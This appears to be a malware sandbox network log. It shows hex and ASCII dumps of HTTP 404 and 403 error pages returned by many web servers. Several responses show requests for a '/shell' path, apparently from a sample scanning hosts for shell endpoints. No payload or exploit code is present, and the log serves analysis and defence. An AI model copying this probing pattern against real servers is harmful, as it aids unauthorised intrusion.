Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 01 Nov 2021 09:09:57 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 10:00:14 GMTServer: webCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:57 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 04:09:57 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Nov 2021 09:10:30 GMTContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css"><!--body{margin:0;font-size:.7em;font-family:Verdana, Arial,
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 345Date: Fri, 07 Aug 2020 21:28:23 GMTServer: lighttpd/1.4.39Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:02 GMTServer: Apache/2.2.31 (CentOS)Content-Length: 278Keep-Alive: timeout=10Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 33 31 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.31 (CentOS) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:05 GMTServer: Apache/2.4.25 (Debian) mod_fcgid/2.3.9 OpenSSL/1.0.2uContent-Length: 196Keep-Alive: timeout=60, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingX-Frame-Options: SAMEORIGINContent-Type: text/htmlX-Content-Type-Options: nosniffDate: Mon, 01 Nov 2021 10:12:17 GMTCache-Control: no-cacheContent-Length: 223X-XSS-Protection: 1; mode=blockConnection: Keep-AliveAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 01 Nov 2021 09:10:05 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 01 Nov 2021 09:10:05 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:10:01 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 01 Nov 2021 09:10:06 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:05 GMTServer: ApacheContent-Length: 203Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Oct 2021 12:37:23 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 179Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 73 68 65 6c 6c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /shell</p></body></html>
